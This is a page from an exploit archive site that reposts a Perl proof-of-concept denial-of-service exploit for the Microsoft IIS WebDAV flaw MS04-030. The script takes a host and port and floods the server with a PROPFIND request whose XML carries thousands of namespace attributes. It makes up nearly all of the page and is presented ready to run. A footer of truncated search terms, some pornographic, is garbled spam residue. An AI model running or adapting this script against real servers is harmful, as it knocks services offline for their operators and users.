about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)



2004-10-20 Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
 

CAN-2003-0718

#!/usr/bin/perl
# IIS BlowOut 
# POC exploit for MS04-030. Found by Amit Klein. 
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port

use IO::Socket;

$port = @ARGV[1];
$host = @ARGV[0];


$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => 
$port,Proto => "TCP");


for ($count=1; $count<9999; $count++) #more than nuff
{

$xmlatt = $xmlatt. "xmlns:z" . $count .
"=\"xml:\" "; 

}



$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind
xmlns:a=\"DAV:\" " . 
$xmlatt . 
">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";

$l=length($xmldata);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: 
$host\nContent-length: $l\n\n$xmldata\n\n"; 

syswrite($socket,$req,length($req));

close $socket;


securitydot.net - 2004-10-20

Advertising

Copyright 2007, SecurityDot
Sun, 22 Nov 2009 16:10:20 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
zoosex.com OLACOS cerber memek bau Sania mirz ,web,wiz,f Www.Bombay Www,sex0wa Www.r66 snmp CA-20 www.2sex.c mambamovie Joomla Com Freexxxpor /search/ex t824t p....php.h free girls koika wenwen119. Apache 2.2 Www.Sanase 136ys.com 2.6.20 r00 www.qianya 200 /compo news for c www.hlcdjx php includ t403t CMS is Fre kube lance we st.html apache 2.0 angellina Sex Videos bolly wood yk2099.cn Www.sneha www.z1sex. mybb 2.1 www.dahuaj PHP 4.4.8 Fhoto sex. tamil hero cerita nge sputftp free nude 123 www.mallu,